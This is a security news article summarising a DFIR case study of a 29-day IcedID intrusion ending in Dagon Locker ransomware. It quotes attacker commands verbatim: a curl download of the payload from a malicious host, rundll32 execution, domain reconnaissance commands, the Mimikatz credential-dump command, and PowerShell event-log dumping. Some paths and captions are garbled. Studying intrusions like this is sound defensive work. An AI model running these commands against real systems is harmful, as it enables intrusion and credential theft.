Hackers Tool 29 Days from Initial Hack to Sabotage Ransomware Attack

Cybersecurity experts have meticulously traced the timeline of a sophisticated ransomware attack that spanned 29 days from the initial breach to the deployment of Dagon Locker ransomware.

This case study not only illuminates cybercriminals’ efficiency and persistence but also underscores the evolving landscape of cyber threats that organizations face today.

Initial Compromise and Escalation

The attack commenced with the network infiltration via IcedID, a notorious malware initially designed for banking fraud but has since evolved into a versatile tool for broader cybercriminal activities.

The malware was delivered through a deceptive email, deceiving an employee into downloading a malicious JavaScript file.

Once inside the system, IcedID established a foothold by communicating with a command and control server, setting the stage for further malicious activities.

Hackers Tool 29 Days from Initial Hack to Sabotage Ransomware Attack

Is Your Network Under Attack? - Read CISO’s Guide to Avoiding the Next Breach - Download Free Guide

Deployment of Tools

Over the subsequent days, the attackers deployed various instruments to maintain persistence and move laterally across the network.

Rclone, Netscan, Nbtscan, AnyDesk, Seatbelt, Sharefinder, and AdFind were utilized to scout the network landscape and prepare for the final payload.

This phase was critical as it allowed the attackers to map out the network, identify valuable targets, and strategically plan the ransomware deployment.

This case study provides a detailed analysis of each attack phase based on insights from The DFIR Report.

The attackers initially gained access through the IcedID malware, typically distributed via phishing emails containing malicious attachments or links.

The primary goal during this phase was to establish a foothold within the network without raising alarms.


Following initial access, the malware installed scripts persistently within the host system.

This set the stage for the deployment of further payloads and deeper network penetration.

When the user executed the downloaded Javascript file, Document_Scan_468.js, the following happened:

  • A bat file was created using a curl command to download the IcedID payload from moashraya[.]com.
    • C:WindowsSystem32cmd.exe” /c echo curl https://moashraya[.]com/out/t.php –output “%temp%magni.waut.a” –ssl no-revoke –insecure –location > “%temp%magni.w.bat
  • Execution of the batch script.
    • cmd.exe /c “%temp%magnu.w.bat”
  • After downloading, the file magni.waut.a is renamed to magni.w.
    • cmd.exe /c ren “%temp%magni.waut.a” “magni.w”
  • Using rundll32.exe, it executes the function scab with the arguments k arabika752 from the downloaded and renamed file magni.w.
    • rundll32 “%temp%magni.w”, scab k arabika752

The attackers ensured their continued presence in the network by using sophisticated persistence mechanisms, such as registry modifications and scheduled tasks.

The threat actor created several scheduled tasks on different servers to achieve persistent execution of Cobalt Strike.

As you can see below, the scheduled task files were created by a svchost injected process.

Scheduled task files were created by a svchost injected process.
Scheduled task files were created by a svchost injected process.

This allowed them to maintain control over the compromised systems even in the event of reboots or attempted cleanups.

Privilege Escalation

The attackers exploited system vulnerabilities and misconfigurations to gain higher-level privileges.

When the threat actor created the new user account, they added it to a privileged active directory group.

privileged active directory group
privileged active directory group

Elevated privileges enabled them to manipulate system processes and access restricted areas of the network.

The attackers employed various techniques to avoid detection, including confusing their malware, disabling security measures, and using legitimate administrative tools.

IcedID injecting itself into svchost.exe
IcedID injecting itself into svchost.exe


Integrate ANY.RUN in Your Company for Effective Malware Analysis

Are you from SOC, Threat Research, or DFIR departments? If so, you can join an online community of 400,000 independent security researchers:

  • Real-time Detection
  • Interactive Malware Analysis
  • Easy to Learn by New Security Team members
  • Get detailed reports with maximum data
  • Set Up Virtual Machine in Linux & all Windows OS Versions
  • Interact with Malware Safely

If you want to test all these features now with completely free access to the sandbox:

These actions helped maintain the secrecy of the attack, allowing it to progress unhindered.

Cobalt Strike offers a suite of tools for retrieving hashed credentials from the LSASS (Local Security Authority Subsystem Service) process, including the ‘logonpassword’ command.

This command employs the Mimikatz module ‘sekurlsa::logonpasswords’ to extract credentials directly from system memory.

Sysmon correctly which allows tracking access to the LSASS memory
Sysmon correctly which allows tracking access to the LSASS memory

To effectively monitor and identify such unauthorized activities, it is essential to implement and fine-tune Sysmon, a system monitoring utility.

Proper configuration of Sysmon enables monitoring attempts to access LSASS memory, which is a critical step in detecting potential credential theft, as depicted in the accompanying image.

 Access to credentials facilitated unauthorized access to systems and data, increasing the attackers’ control over the network.

Once inside the network, the attackers conducted surveillance to identify valuable assets and data.

During the Execution phase detailed in this report, we observed the IcedID malware injecting into the parent process svchost.exe, which subsequently executed the credential extraction.

This behavior was a critical observation, linking the malware to the unauthorized access of the LSASS process.

ipconfig /all


net config workstation

nltest /domain_trusts

nltest /domain_trusts /all_trusts

net view /all /domain

net view /all

net group "Domain Admins" /domain

 This information guided their subsequent actions and target selection within the compromised environment.

Lateral Movement

The attackers used stolen credentials and tools to move laterally across the network.

To facilitate lateral movement across various systems, the threat actor utilized the “jump winrm” feature in Cobalt Strike beacons, which leverages the Windows PowerShell Remoting protocol (MS-PSRP).

This method underscores the sophisticated use of built-in network protocols to expand the attack’s reach.

built-in network protocols to expand the attack's reach.
built-in network protocols to expand the attack’s reach.

Extracted from the memory of a compromised server – shows the processes executed when Cobalt Strike beacons perform this type of lateral movement

The lateral movement allowed them to extend their reach and compromise additional systems.


During the intrusion, the threat actor targeted and accessed multiple files associated with the IT department.

Additionally, they used PowerShell commands executed via a Cobalt Strike beacon to dump and exfiltrate Windows Security event logs from a domain controller.

get-eventlog security

get-eventlog security >> ot.txt

compress-archive -path ot.txt -destinationpath ot.zip

get-eventlog security | Out-String 4096 >> full_string.txt

get-eventlog security | Out-String 8192 >> 8.txt

This data could be used for direct financial gain, further attacks, or ransom negotiations.

Command and Control

During this intrusion, the extended duration and network instability resulted in the absence of some typically available network artifacts, leading to potential gaps in the data.

The command and control traffic for IcedID was detected only during the first two days of the intrusion.

Conversely, Cobalt Strike command and control traffic commenced on the second day and persisted throughout the intrusion.

The analysis of the Cobalt Strike configuration, extracted from a previously mentioned PowerShell script, revealed several tactics employed by the threat actor:

  • They selected gpupdate.exe, a legitimate Windows process, to inject Cobalt Strike shellcode.
  • They utilized the Early Bird APC Queue injection technique to bypass security measures.
  • They attempted to disguise Cobalt Strike traffic as legitimate connections to cloudfront.amazonaws.com.
  • They configured three IP addresses as command and control (C2) servers.

This enabled them to send commands, deploy additional payloads, and exfiltrate data.

Data was exfiltrated to servers controlled by the attackers.

The exfiltration posed significant privacy and security risks, leading to potential data breaches and compliance issues.

The deployment of Dagon Locker ransomware resulted in encrypted files and systems, operational downtime, and financial losses due to ransom demands and recovery costs.

The attack necessitated a comprehensive incident response, including system restoration, strengthening of security postures, and regulatory reporting.


  • Day 1: Entry via IcedID malware.
  • Day 2-10: Establishment of persistence and privilege escalation.
  • Day 11-20: Reconnaissance and lateral movement.
  • Day 21-28: Data collection and staging for ransomware deployment.
  • Day 29: Activation of Dagon Locker ransomware.

This attack exemplifies the rapid and stealthy nature of modern cyber threats.

Organizations must enhance their cybersecurity frameworks, adopt proactive threat-hunting practices, and ensure continuous monitoring to defend against such sophisticated attacks.

The detailed breakdown provided by The DFIR Report not only illuminates the specific attack vectors but also serves as a critical learning tool for the cybersecurity community.






















Cobalt Strike



































Combat Email Threats with Easy-to-Launch Phishing Simulations: Email Security Awareness Training -> Try Free Demo 

The post Hackers Tool 29 Days from Initial Hack to Sabotage Ransomware Attack appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.

Go to Source
Author: Divya